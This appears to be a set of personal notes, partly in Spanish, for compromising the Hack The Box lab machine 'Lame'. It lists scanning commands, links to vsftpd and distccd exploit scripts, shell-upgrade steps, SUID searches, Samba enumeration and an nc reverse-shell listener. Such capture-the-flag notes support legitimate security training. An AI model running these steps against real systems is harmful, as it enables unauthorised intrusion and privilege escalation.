Lame

echo “10.129.186.12 lame.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA pit 10.129.186.12 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA lame 10.129.186.12

nmap -sU -O -p- -oA lame-udp 10.129.186.12

nikto -h 10.129.186.12:80

gobuster dir -k -u http://10.129.186.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

https://github.com/Hellsender01/vsftpd_2.3.4_Exploit

No funciono

https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py

upgrade shell

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

find -name user.txt 2>/dev/null | xargs head -c 18; echo

uname -a

find -perm -4000 2>/dev/null

which nmap | xargs ls -l

searchsploit samba 3 command execution

smbmap -H 10.129.186.12

smbclient //10.129.186.12/tmp —option=‘client min protocol=NT1’ -N

smbclient //10.129.186.12/tmp -N

nc -lvnp 4444

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187